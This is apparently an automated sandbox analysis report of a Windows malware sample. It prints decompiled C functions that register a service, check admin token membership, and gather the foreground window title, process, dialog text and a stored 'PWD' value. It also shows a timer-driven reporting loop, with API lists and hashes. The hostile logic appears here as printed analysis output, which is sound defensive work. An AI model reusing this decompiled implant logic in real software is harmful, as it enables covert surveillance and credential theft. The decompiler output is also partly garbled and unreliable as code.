    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Process$Free$Path$AllocBackslashFile$DirectoryExitModule$AttributesCallsCurrentDisableFolderHandleLibraryMemoryMoveNameRemoveSpecSpecialSystemThreadwsprintf
    • String ID: %s%s$%s%s%s$.ini$.odt$15.0.$TeamViewer$ar.j$gd$h2$pass$pg$s$t$tx$word
    • API String ID: 566710939-331841303
    • Opcode ID: c54d4bdc3dbab448e98f50e332ac6f7aa1cc7c2d2871344cafd73ed1cba1bdc3
    • Instruction ID: fdfcc7558374c680c15a130d053f50afd94914b3232bcdda252f7e08366b8f47
    • Opcode Fuzzy Hash: c54d4bdc3dbab448e98f50e332ac6f7aa1cc7c2d2871344cafd73ed1cba1bdc3
    • Instruction Fuzzy Hash: 31A28EB1904742EFDB60DFA9CA86A9FBBB8AF85344F00491DF64997240F7349844CF66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E6ECA3B60(intOrPtr* _a8) {
    				struct _SERVICE_STATUS* _v4;
    				int _v8;
    				CHAR* _t9;
    				int _t10;
    				void* _t13;
    				int _t14;
    				signed int _t18;
    				short* _t20;
    				int _t21;
    				void _t22;
    				void* _t23;
    				void* _t26;
    				intOrPtr* _t27;
    				void* _t30;
    
    				_t9 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1b60
    				_t10 = SetCurrentDirectoryA(_t9); // executed
    				_t27 = _a8;
    				 *0x6ecb043c = 0x20;
    				 *0x6ecb0440 = 2;
    				 *0x6ecb0444 = 0x85;
    				 *0x6ecb0448 = 0;
    				 *0x6ecb044c = 0;
    				 *0x6ecb0450 = 0;
    				 *0x6ecb0454 = 0;
    				__imp__RegisterServiceCtrlHandlerExW( *_t27, E6ECA3A70, 0, _t23, _t26); // executed
    				 *0x6ecb0394 = _t10;
    				if(_t10 == 0) {
    					 *0x6ecb0440 = 1;
    					SetServiceStatus(0, 0x6ecb043c);
    					ExitProcess(0);
    				}
    				_t21 = _v8;
    				 *0x6ecb0440 = 4;
    				_t30 = _t21 - 1;
    				if(_t30 <= 0) {
    					L7:
    					_t13 = HeapAlloc(GetProcessHeap(), 8, 4);
    					if(_t13 != 0) {
    						_t22 = M6ECB04E8; // 0x1
    						 *_t13 = _t22;
    						CloseHandle(CreateThread(0, 0, E6ECA3930, _t13, 0, 0));
    					}
    					L9:
    					_v4 = 0x6ecb043c;
    					_t14 =  *0x6ecb0394; // 0x0
    					_v8 = _t14;
    					return SetServiceStatus(??, ??);
    				}
    				_t18 = 1;
    				if(_t30 <= 0) {
    					goto L7;
    				} else {
    					while(1) {
    						_t20 =  *((intOrPtr*)(_t27 + _t18 * 4));
    						if( *_t20 == 0x73 &&  *((intOrPtr*)(_t20 + 2)) == 0) {
    							goto L9;
    						}
    						_t18 = _t18 + 1;
    						if(_t18 < _t21) {
    							continue;
    						}
    						goto L7;
    					}
    					goto L9;
    				}
    			}
    0x6eca3b60
    0x6eca3b68
    0x6eca3b6e
    0x6eca3b75
    0x6eca3b7f
    0x6eca3b89
    0x6eca3b93
    0x6eca3b99
    0x6eca3b9f
    0x6eca3ba5
    0x6eca3bb3
    0x6eca3bb9
    0x6eca3bc0
    0x6eca3c47
    0x6eca3c51
    0x6eca3c58
    0x6eca3c58
    0x6eca3bc2
    0x6eca3bc6
    0x6eca3bd0
    0x6eca3bd3
    0x6eca3bf4
    0x6eca3bff
    0x6eca3c07
    0x6eca3c09
    0x6eca3c19
    0x6eca3c22
    0x6eca3c22
    0x6eca3c28
    0x6eca3c2a
    0x6eca3c32
    0x6eca3c37
    0x6eca3c3b
    0x6eca3c3b
    0x6eca3bd5
    0x6eca3bd8
    0x00000000
    0x6eca3be0
    0x6eca3be0
    0x6eca3be0
    0x6eca3be7
    0x00000000
    0x00000000
    0x6eca3bef
    0x6eca3bf2
    0x00000000
    0x00000000
    0x00000000
    0x6eca3bf2
    0x00000000
    0x6eca3be0

    APIs
    • SetCurrentDirectoryA.KERNELBASE(00CD1B60), ref: 6ECA3B68
    • RegisterServiceCtrlHandlerExW.ADVAPI32(?,6ECA3A70,00000000), ref: 6ECA3BB3
    • GetProcessHeap.KERNEL32(00000008,00000004,?,6ECA3A70,00000000), ref: 6ECA3BF8
    • HeapAlloc.KERNEL32(00000000,?,6ECA3A70,00000000), ref: 6ECA3BFF
    • CreateThread.KERNEL32 ref: 6ECA3C1B
    • CloseHandle.KERNEL32(00000000,?,6ECA3A70,00000000), ref: 6ECA3C22
    • SetServiceStatus.ADVAPI32(00000000,6ECB043C,?,6ECA3A70,00000000), ref: 6ECA3C51
    • ExitProcess.KERNEL32 ref: 6ECA3C58
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapProcessService$AllocCloseCreateCtrlCurrentDirectoryExitHandleHandlerRegisterStatusThread
    • String ID:
    • API String ID: 2085172483-0
    • Opcode ID: cb418acb856ebe091435c3f1f83efbe1d3f58c178e06e5489648d69df486b830
    • Instruction ID: 97256410094a4cb9aa91f41f7589cedd0755f44c6f24092b36188f961b741704
    • Opcode Fuzzy Hash: cb418acb856ebe091435c3f1f83efbe1d3f58c178e06e5489648d69df486b830
    • Instruction Fuzzy Hash: A0210C70500A01EBCB109F9DCB5EA5FBBB9FF96708F10891EEA198B244E7759845CF21
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E6ECA3280(void* _a4) {
    				void _v0;
    				void* _v16;
    				void _v72;
    				long _v76;
    				long _v80;
    				long _v84;
    				void* _v88;
    				char _v96;
    				DWORD* _t32;
    				int _t36;
    				long _t52;
    
    				_t52 = _a4;
    				_v76 = 0;
    				_v84 = _t52;
    				if(_t52 != 0 || OpenProcessToken(0xffffffff, 0xa,  &_v84) != 0) {
    					_a4 = 0;
    					_v80 = 0;
    					if( *0x6ecb027c <= 5) {
    						L7:
    						DuplicateToken(_v84, 1,  &_a4);
    						if(_v0 != 0) {
    							goto L8;
    						}
    					} else {
    						_t36 = GetTokenInformation(_v84, 0x12,  &_v72, 4,  &_v80); // executed
    						if(_t36 != 0 && _v76 == 3) {
    							GetTokenInformation(_v88, 0x13,  &_v0, 4,  &_v84);
    						}
    						if(_v0 != 0) {
    							L8:
    							_t32 =  &_v84;
    							_v84 = 0x44;
    							__imp__CreateWellKnownSid(0x1a, 0,  &_v72, _t32);
    							if(_t32 != 0) {
    								__imp__CheckTokenMembership(_v16,  &_v88,  &_v96);
    							}
    							FindCloseChangeNotification(_v16); // executed
    						} else {
    							goto L7;
    						}
    					}
    					if(_t52 == 0) {
    						CloseHandle(_v88);
    					}
    					return _v80;
    				} else {
    					return _v76;
    				}
    			}
    0x6eca3284
    0x6eca3288
    0x6eca3290
    0x6eca3296
    0x6eca32bd
    0x6eca32c5
    0x6eca32cd
    0x6eca3313
    0x6eca331f
    0x6eca332a
    0x00000000
    0x00000000
    0x6eca32cf
    0x6eca32e9
    0x6eca32ed
    0x6eca3309
    0x6eca3309
    0x6eca3311
    0x6eca332c
    0x6eca332c
    0x6eca333a
    0x6eca3342
    0x6eca334a
    0x6eca335b
    0x6eca335b
    0x6eca3366
    0x00000000
    0x00000000
    0x00000000
    0x6eca3311
    0x6eca336a
    0x6eca3371
    0x6eca3371
    0x6eca337c
    0x6eca337d
    0x6eca3385
    0x6eca3385

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,0000000A,?), ref: 6ECA32A1
    • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 6ECA32E9
    • GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?), ref: 6ECA3309
    • DuplicateToken.ADVAPI32(?,00000001,00000000), ref: 6ECA331F
    • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 6ECA3342
    • CheckTokenMembership.ADVAPI32(00000000,00000044,?), ref: 6ECA335B
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 6ECA3366
    • CloseHandle.KERNEL32(?), ref: 6ECA3371
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$CloseInformation$ChangeCheckCreateDuplicateFindHandleKnownMembershipNotificationOpenProcessWell
    • String ID: D
    • API String ID: 1214873377-2746444292
    • Opcode ID: cec1f532202aeaf7cd342d31ef79be0f4724c45e7c17bcfc6230524c85040bc2
    • Instruction ID: e045536126cdc9d0a59fb64467133c925c829d8b1d4a158061d09b6841c53542
    • Opcode Fuzzy Hash: cec1f532202aeaf7cd342d31ef79be0f4724c45e7c17bcfc6230524c85040bc2
    • Instruction Fuzzy Hash: 3F31E9B1548306AFD700CB58C859BAFB7F9BBC5B14F00891DF6A547284EB74E50ACB52
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 82%
    			E6ECA6D50(intOrPtr _a8, char _a49, char _a50) {
    				intOrPtr _v0;
    				char _v3;
    				short _v572;
    				short _v580;
    				short _v1092;
    				char _v1364;
    				char _v1372;
    				char _v1864;
    				short _v1872;
    				short _v1884;
    				char _v1896;
    				char _v1900;
    				struct HWND__* _v1908;
    				char _v1912;
    				void* _v1928;
    				struct HWND__* _v1932;
    				void* _v1936;
    				struct tagMSG _v1964;
    				char _v1972;
    				struct _FILETIME _v1980;
    				void* _v1984;
    				struct HWND__* _v1988;
    				struct HWND__* _v1992;
    				struct HWND__* _v1996;
    				struct HWND__* _v2000;
    				void _v2004;
    				void* _v2008;
    				void* _v2020;
    				void* _v2024;
    				void* _v2028;
    				char _v2032;
    				void* _v2036;
    				void* _v2040;
    				signed short _v2044;
    				signed int _v2048;
    				void* _v2052;
    				char _v2068;
    				void* _v2072;
    				char _v2074;
    				char _v2076;
    				signed int _v2084;
    				char _v2088;
    				long _v2092;
    				char _v2094;
    				char _v2096;
    				intOrPtr _v2100;
    				struct HWND__* _v2104;
    				void* _v2120;
    				int _v2124;
    				signed int _t251;
    				signed int _t252;
    				char _t254;
    				WCHAR* _t255;
    				int _t263;
    				void* _t269;
    				void* _t270;
    				WCHAR* _t271;
    				WCHAR* _t273;
    				char _t275;
    				char _t281;
    				char _t284;
    				void* _t288;
    				CHAR* _t293;
    				int _t294;
    				char _t295;
    				signed int _t296;
    				void* _t299;
    				signed char _t302;
    				signed int _t303;
    				CHAR* _t314;
    				signed int _t316;
    				signed int _t317;
    				void* _t322;
    				intOrPtr _t324;
    				void* _t329;
    				void* _t334;
    				char _t344;
    				long _t346;
    				struct HWND__* _t370;
    				char _t373;
    				intOrPtr _t377;
    				char _t379;
    				void* _t380;
    				signed int _t383;
    				void* _t386;
    				CHAR* _t395;
    				struct HWND__* _t406;
    				struct HWND__* _t407;
    				signed int _t417;
    				signed int _t422;
    				signed short _t423;
    				signed int _t424;
    				CHAR* _t442;
    				CHAR* _t443;
    				CHAR* _t445;
    				void* _t467;
    				void* _t468;
    				void* _t469;
    				int _t470;
    				void* _t471;
    				struct HWND__* _t472;
    				void* _t473;
    				void* _t474;
    				void _t475;
    				intOrPtr* _t476;
    				void* _t477;
    				CHAR* _t478;
    				void* _t479;
    				void* _t481;
    				void* _t486;
    				signed short _t487;
    				void* _t488;
    				void* _t489;
    				void* _t490;
    				CHAR* _t492;
    				char* _t493;
    				char* _t494;
    				void* _t495;
    				signed int _t496;
    				void* _t498;
    				void* _t499;
    				void* _t500;
    				void* _t501;
    				void* _t503;
    				void* _t504;
    				void* _t505;
    				void* _t513;
    				void* _t514;
    				void* _t523;
    				void* _t535;
    
    				_t498 = (_t496 & 0xfffffff8) - 0x800;
    				_push(0x14);
    				_push( &_v1980);
    				L6ECAC2EE();
    				_t370 = 0;
    				_t481 = VirtualAlloc(0, 0x1000, 0x1000, 4);
    				if(_t481 == 0) {
    					L91:
    					return 0;
    				} else {
    					_push(0x14);
    					_push( &_v1864);
    					L6ECAC2EE();
    					GetLocaleInfoW(0x400, 0x5a,  &_v1872, 9);
    					CharLowerW( &_v1872);
    					_push(0x9c);
    					_push(0x6ecb03a0);
    					L6ECAC2EE();
    					_push( &_v2036);
    					_push( &_v2032);
    					_push( &_v2040);
    					 *0x6ecb03a0 = 0x9c;
    					_v2040 = 0;
    					_v2032 = 0;
    					_v2036 = 0;
    					L6ECAC330();
    					 *0x6ecb03ac = _v2048 & 0x0000ffff;
    					_t251 = M6ECB04A8; // 0x0
    					 *0x6ecb03a4 = _v2052;
    					 *0x6ecb03a8 = _v2044;
    					 *0x6ecb043a = 4;
    					if(_t251 != 0) {
    						_push(0x435a88);
    						_push(1);
    						_t417 =  &_v2032;
    						_push(_t417);
    						_push(_t251);
    						_v2032 = 0x5e6f0892;
    						_v2028 = 0;
    						_v2024 = 0;
    						_v2020 = 0;
    						E6ECA1DB0();
    						_t251 = _v2020;
    						_t498 = _t498 + 0x10;
    						if(_t251 != 0) {
    							_v2072 = 0;
    							_t251 =  *_t251(0, 0x65,  &_v2072);
    							if(_t251 == 0) {
    								_t251 = _v2084;
    								if(_t251 != 0) {
    									_t251 =  *(_t251 + 0x10) & 0x00001000;
    									 *0x6ecb043a = _t417 & 0xffffff00 | _t251 == 0x00001000;
    								}
    							}
    						}
    					}
    					_push(0x34);
    					_push(_t481);
    					L6ECAC2EE();
    					 *((intOrPtr*)(_t481 + 2)) = 0x832eb9b;
    					 *((short*)(_t481 + 6)) = 0x102;
    					 *((char*)(_t481 + 8)) = 1;
    					_t422 = M6ECB04E4; // 0x0
    					 *((intOrPtr*)(_t481 + 0x18)) = _t422;
    					_t513 = M6ECB050C - _t370; // 0x0
    					_v2092 = _t370;
    					_t252 = _t251 & 0xffffff00 | _t513 != 0x00000000;
    					 *(_t481 + 9) = _t252;
    					_t377 =  *0x6ecb03a4; // 0x0
    					 *((intOrPtr*)(_t481 + 0x1c)) = _t377;
    					_t423 =  *0x6ecb03a8; // 0x0
    					 *(_t481 + 0x20) = _t423;
    					_t514 = M6ECB04EC - _t370; // 0x0
    					 *((char*)(_t481 + 0xa)) = _t252 & 0xffffff00 | _t514 != 0x00000000;
    					 *((short*)(_t481 + 0x12)) =  *0x6ecb043a & 0x000000ff;
    					_t424 =  *0x6ecb03ac; // 0x0
    					 *(_t481 + 0x24) = _t424;
    					_t254 = M6ECB0544; // 0x1
    					 *((char*)(_t481 + 0xc)) = _t254;
    					_t379 = M6ECB0548; // 0x1
    					 *((char*)(_t481 + 0xb)) = _t379;
    					 *(_t481 + 0xf) = _t370;
    					 *((char*)(_t481 + 0x11)) = 0x17;
    					_t255 = M6ECB04F8; // 0xcd21b8
    					_t467 = E6ECAA2F0(_t255, 1,  &_v2092);
    					_t499 = _t498 + 0xc;
    					if(_t467 != _t370) {
    						_t47 = _t481 + 0x34; // 0x34
    						RtlMoveMemory(_t47, _t467, _v2092);
    						HeapFree(GetProcessHeap(), _t370, _t467);
    					}
    					_t380 = M6ECB0504; // 0xcd3fb0
    					_v2092 = _t370;
    					_t468 = E6ECAA2F0(_t380, 1,  &_v2092);
    					_t500 = _t499 + 0xc;
    					if(_t468 != _t370) {
    						_t53 =  &_a49; // 0x35
    						RtlMoveMemory(_t481 + _t53, _t468, _v2092);
    						HeapFree(GetProcessHeap(), _t370, _t468);
    					}
    					_t469 = _v2092 +  &_a50;
    					_v2092 = _t370;
    					_t486 = E6ECAA2F0( &_v1900, 1,  &_v2092);
    					_t501 = _t500 + 0xc;
    					if(_t486 != _t370) {
    						RtlMoveMemory(_t469 + _t481, _t486, _v2092);
    						HeapFree(GetProcessHeap(), _t370, _t486);
    					}
    					_t487 = _t469 + _v2092 + 1;
    					_v2044 = _t487;
    					_t470 = SetTimer(_t370, _t370, _t370, _t370);
    					_v2068 = 0x28;
    					_v2052 = 1;
    					_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
    					if(_t263 == _t370) {
    						L90:
    						VirtualFree(_t481, _t370, 0x8000);
    						goto L91;
    					} else {
    						L15:
    						L15:
    						if(_v2052 == _t370) {
    							_t383 = _v1964.message;
    						} else {
    							_t383 = 0x113;
    							_v2052 = _t370;
    							_v1964.message = 0x113;
    							_v1964.hwnd = _t370;
    							_v1964.wParam = _t470;
    						}
    						if(_t263 == 0xffffffff || _t383 == 0x10) {
    							goto L89;
    						}
    						if(_t383 == 0x113) {
    							if(_v1964.hwnd != _t370) {
    								L87:
    								DispatchMessageA( &_v1964);
    								_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
    								if(_t263 != _t370) {
    									_t487 = _v2048;
    									goto L15;
    								}
    								goto L90;
    							}
    							L24:
    							if(_t523 != 0) {
    								goto L87;
    							}
    							KillTimer(_t370, _t470);
    							E6ECA6A90( &_v2028, _t370);
    							_t269 = M6ECB04D8; // 0x0
    							_t270 = E6ECA38A0(_t269, _t370, _t370, 1);
    							_push(0x1000 - _t487);
    							_t471 = _t481 + _t487;
    							_push(_t471);
    							 *((char*)(_t481 + 0xe)) = _t383 & 0xffffff00 | _t270 != 0x00000000;
    							L6ECAC2EE();
    							_t271 = M6ECB04F8; // 0xcd21b8
    							_t386 = M6ECB0504; // 0xcd3fb0
    							_v2104 = _t370;
    							wsprintfW( &_v580, L"%s\\%s", _t386, _t271);
    							_t273 = M6ECB04D0; // 0xcc4128
    							_t503 = _t501 + 0x28;
    							if(GetPrivateProfileStringW(L"PWD",  &_v572, _t370,  &_v1092, 0x103, _t273) != 0) {
    								_t495 = E6ECAA2F0( &_v1092, 1,  &_v2096);
    								_t503 = _t503 + 0xc;
    								if(_t495 != _t370) {
    									RtlMoveMemory(_t471, _t495, _v2096);
    									HeapFree(GetProcessHeap(), _t370, _t495);
    								}
    							}
    							_t275 = _v2096;
    							_v2092 = _t275 + _v2048 + 1;
    							 *(_t481 + 0x30) = _t275;
    							_t472 = GetForegroundWindow();
    							_v1884 = 0;
    							if(_t472 != _t370) {
    								GetWindowTextW(_t472,  &_v1884, 0x104);
    							}
    							_v2096 = _t370;
    							_t488 = E6ECAA2F0( &_v1884, 1,  &_v2096);
    							_t504 = _t503 + 0xc;
    							if(_t488 != _t370) {
    								RtlMoveMemory(_t481 + _v2092, _t488, _v2096);
    								HeapFree(GetProcessHeap(), _t370, _t488);
    							}
    							_t489 = _v2092 + _v2096 + 1;
    							_v1884 = 0;
    							_v2096 = _t370;
    							if(_t472 != _t370) {
    								_v2088 = _t370;
    								GetWindowThreadProcessId(_t472,  &_v2088);
    								_t344 = _v2088;
    								if(_t344 > _t370) {
    									_v1936 = _t344;
    									asm("pxor xmm0, xmm0");
    									_v2092 = _t370;
    									_v1932 = _t370;
    									_v1928 = 0x18;
    									asm("movq [esp+0xd0], xmm0");
    									asm("movq [esp+0xd8], xmm0");
    									_v1908 = _t370;
    									_t346 = NtOpenProcess( &_v2092, 0x410,  &_v1928,  &_v1936);
    									if(_t346 >= 0) {
    										_push(0x104);
    										_push( &_v1896);
    										_push(_t370);
    										_push(_v2104);
    										L6ECAC38A();
    										if(_t346 != 0) {
    											_t479 = E6ECAA2F0( &_v1912, 1,  &_v2124);
    											_t504 = _t504 + 0xc;
    											if(_t479 != _t370) {
    												RtlMoveMemory(_t481 + _t489, _t479, _v2124);
    												HeapFree(GetProcessHeap(), _t370, _t479);
    											}
    										}
    										NtClose(_v2120);
    									}
    								}
    							}
    							_t281 = 0;
    							_t473 = _v2096 +  &_v3;
    							_v2092 = _t473;
    							_v2096 = 0;
    							_t535 =  *0x6ecb0398 - _t370; // 0x0
    							if(_t535 == 0) {
    								L54:
    								_t474 = _t473 + _t281 + 1;
    								_v2068 = 1;
    								if(_t281 > 1) {
    									_t406 =  *0x6ecb0398; // 0x0
    									_t492 = _t474 + _t481;
    									_t281 = GetDlgItemTextA(_t406, 0x4e83, _t492, 0xfff - _t474);
    									_v2096 = _t281;
    									if(_t281 > _t370 &&  *_t481 == 0x2d) {
    										_t281 = 0;
    										_v2096 = 0;
    										 *_t492 = 0;
    										 *((char*)(_t474 + _t481 + 1)) = 0;
    									}
    								}
    								_v1992 = _t370;
    								_v1988 = _t370;
    								_v2000 = _t370;
    								_v1996 = _t370;
    								_t475 = _t474 + _t281 + 1;
    								_v2072 = _t370;
    								 *(_t481 + 0x2c) = _t370;
    								 *(_t481 + 0x28) = _t370;
    								if(_v1964.message != 0x83fe) {
    									L61:
    									 *((char*)(_t481 + 0xd)) = 0;
    									 *(_t481 + 0x14) = _t370;
    									goto L62;
    								} else {
    									_t334 = _v1964.lParam;
    									if(_t334 == _t370) {
    										goto L61;
    									}
    									 *((char*)(_t481 + 0xd)) =  *((intOrPtr*)(_t334 + 0x10));
    									 *(_t481 + 0x14) =  *(_t334 + 4);
    									_v1992 =  *((intOrPtr*)(_t334 + 0x14));
    									_v1988 =  *(_t334 + 0x18);
    									_v2072 = _t334;
    									 *(_t481 + 0x2c) =  *(_t334 + 0x18);
    									L62:
    									_push( &_v2088);
    									_push( &_v2092);
    									_v2092 = _t370;
    									_v2088 = _t370;
    									_v1980.dwHighDateTime = E6ECA66E0();
    									_t284 = _v2088;
    									_push(1);
    									_v1996 = _t284;
    									_v2000 = _v2092;
    									 *(_t481 + 0x28) = _t284;
    									 *_t481 = _t475;
    									E6ECA53F0(_v2024, _v2028, _t481, _t475);
    									_t287 = _v1992;
    									_t505 = _t504 + 0x1c;
    									_v2008 = _t481;
    									_v2004 = _t475;
    									if(_v1992 != _t370) {
    										_push(1);
    										E6ECA53F0(_v2024, _v2028, _t287, _v1988);
    										_t505 = _t505 + 0x14;
    									}
    									_push("k");
    									_push( &_v2028);
    									_t288 = E6ECA5690();
    									_push(_t370);
    									_t490 = _t288;
    									E6ECA53F0(_v2024, _v2028, _t481, _t475);
    									_t501 = _t505 + 0x1c;
    									if(_v1980.dwHighDateTime != _t370) {
    										VirtualFree(_v2092, _t370, 0x8000);
    									}
    									_v2088 = _t370;
    									if(_t490 <= _t370) {
    										L77:
    										_push(8);
    										_push( &_v1972);
    										L6ECAC2EE();
    										GetSystemTimeAsFileTime( &_v1980);
    										_v2052 = _v1980.dwLowDateTime;
    										_v2048 = _v1980.dwHighDateTime;
    										_v2092 = _t370;
    										RtlTimeToSecondsSince1970( &_v2052,  &_v2092);
    										_t395 = M6ECB04CC; // 0xcb2da8
    										_t293 = M6ECB04DC; // 0x0
    										_v2096 = 0x6467;
    										_v2094 = 0;
    										_t294 = GetPrivateProfileIntA(_t293,  &_v2096, _t370, _t395);
    										if(_t294 != _t370) {
    											if(_t294 <= _v2100) {
    												E6ECA6A90(_t370, _t370);
    												_t501 = _t501 + 8;
    											}
    										} else {
    											_t302 = _v2028;
    											_t303 = _t302 & 0x000000ff;
    											if(_t302 == 0) {
    												_t303 = 1;
    											}
    											wsprintfA( &_v1372, "%lu", _t303 * 0xe10 + _v2100);
    											_t442 = M6ECB04CC; // 0xcb2da8
    											_t501 = _t501 + 0xc;
    											_t443 = M6ECB04DC; // 0x0
    											WritePrivateProfileStringA(_t443,  &_v2088,  &_v1364, _t442);
    										}
    										goto L83;
    									} else {
    										if(_t490 >= 0x12) {
    											_push(_t370);
    											E6ECA53F0(_v2024, _v2028, _v1984, _t490);
    											_t476 = _v1984;
    											_t501 = _t501 + 0x14;
    											if( *_t476 == 0x832eb9b) {
    												_t314 = M6ECB04CC; // 0xcb2da8
    												_t445 = M6ECB04DC; // 0x0
    												_v2088 = 1;
    												_v2076 = 0x6467;
    												_v2074 = 0;
    												WritePrivateProfileStringA(_t445,  &_v2076, _t370, _t314);
    												_t316 =  *(_t476 + 4) & 0x0000ffff;
    												 *0x6ecb0000 = _t316;
    												if(_t316 < 0xa) {
    													 *0x6ecb0000 = 0x3c;
    												}
    												_t317 =  *(_t476 + 0xc) & 0x0000ffff;
    												if(_t317 <= _t370) {
    													_push(_t370);
    													_push(_t370);
    													_push(_t370);
    													_push(_t370);
    												} else {
    													_push( *(_t476 + 0xa) & 0x000000ff);
    													_t329 = _v1984;
    													_push( *(_t476 + 0xb) & 0x000000ff);
    													_push(_t317 + _t329 + 0x13);
    													_push(_t329 + 0x12);
    												}
    												E6ECA69C0();
    												_t501 = _t501 + 0x10;
    												if( *((intOrPtr*)(_t476 + 0x10)) > _t370) {
    													_t322 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
    													_v0 =  *((intOrPtr*)(_t476 + 6));
    													_t477 = E6ECAA360(( *(_t476 + 0xc) & 0x0000ffff) + _v1984 + ( *(_t476 + 0xe) & 0x0000ffff) + 0x14, 1, 0);
    													_t324 = E6ECAA2F0(_t477, 0, 0);
    													_t501 = _t501 + 0x18;
    													_a8 = _t324;
    													HeapFree(GetProcessHeap(), 0, _t477);
    													CloseHandle(CreateThread(0, 0, E6ECA5B40, _t322, 0, 0));
    													Sleep(0x1f4);
    													_t370 = 0;
    												}
    											}
    										}
    										HeapFree(GetProcessHeap(), _t370, _v1984);
    										if(_v2088 != _t370) {
    											L83:
    											_t295 = _v2088;
    											if(_t295 != _t370) {
    												_t299 =  *_t295;
    												if(_t299 != _t370) {
    													SetEvent(_t299);
    												}
    											}
    											_t296 =  *0x6ecb0000; // 0x3c
    											_t470 = SetTimer(_t370, _t370, _t296 * 0x3e8, _t370);
    											goto L87;
    										} else {
    											goto L77;
    										}
    									}
    								}
    							} else {
    								_t493 = 0;
    								if(_v2068 <= _t370) {
    									goto L54;
    								}
    								_v2072 = 0xfff - _t473;
    								_t478 = _t473 + _t481;
    								L42:
    								L42:
    								if(_t493 > 0) {
    									Sleep(0x1f4);
    								}
    								_t407 =  *0x6ecb0398; // 0x0
    								_t373 = GetDlgItemTextA(_t407, 0x4e82, _t478, _v2072);
    								if( *_t481 == 0x2d || _t373 < 0xb) {
    									goto L46;
    								}
    								_t494 = 0;
    								if(_t373 <= 0) {
    									L52:
    									_t281 = _t373;
    									_v2096 = _t281;
    									L53:
    									_t473 = _v2092;
    									_t370 = 0;
    									goto L54;
    								} else {
    									goto L49;
    								}
    								do {
    									L49:
    									if(StrTrimA( &(_t478[_t494]), " ") != 0) {
    										_t373 = _t373 - 1;
    									}
    									_t494 =  &_v3;
    								} while (_t494 < _t373);
    								goto L52;
    								L46:
    								_t281 = 0;
    								_t493 =  &_v3;
    								_v2096 = 0;
    								 *_t478 = 0;
    								if(_t493 < _v2068) {
    									goto L42;
    								}
    								goto L53;
    							}
    						}
    						_t523 = _t383 - 0x83fe;
    						goto L24;
    						L89:
    						KillTimer(_t370, _t470);
    						goto L90;
    					}
    				}
    			}

    APIs
    • RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA6D67
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004,?,00000014), ref: 6ECA6D7B
    • RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA6D95
    • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000009,?,00000014), ref: 6ECA6DAB
    • CharLowerW.USER32(?), ref: 6ECA6DB9
    • RtlZeroMemory.NTDLL(6ECB03A0,0000009C), ref: 6ECA6DC9
    • RtlGetNtVersionNumbers.NTDLL ref: 6ECA6DF3
    • RtlZeroMemory.NTDLL(00000000,00000034), ref: 6ECA6E8A
    • RtlMoveMemory.NTDLL(00000034,00000000,?), ref: 6ECA6F29
    • GetProcessHeap.KERNEL32(00000000,00000000,00000034,00000000,?), ref: 6ECA6F30
    • HeapFree.KERNEL32(00000000), ref: 6ECA6F37
    • RtlMoveMemory.NTDLL(00000035,00000000,?), ref: 6ECA6F6C
    • GetProcessHeap.KERNEL32(00000000,00000000,00000035,00000000,?), ref: 6ECA6F73
    • HeapFree.KERNEL32(00000000), ref: 6ECA6F7A
    • RtlMoveMemory.NTDLL(?,00000000,?), ref: 6ECA6FB3
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 6ECA6FBA
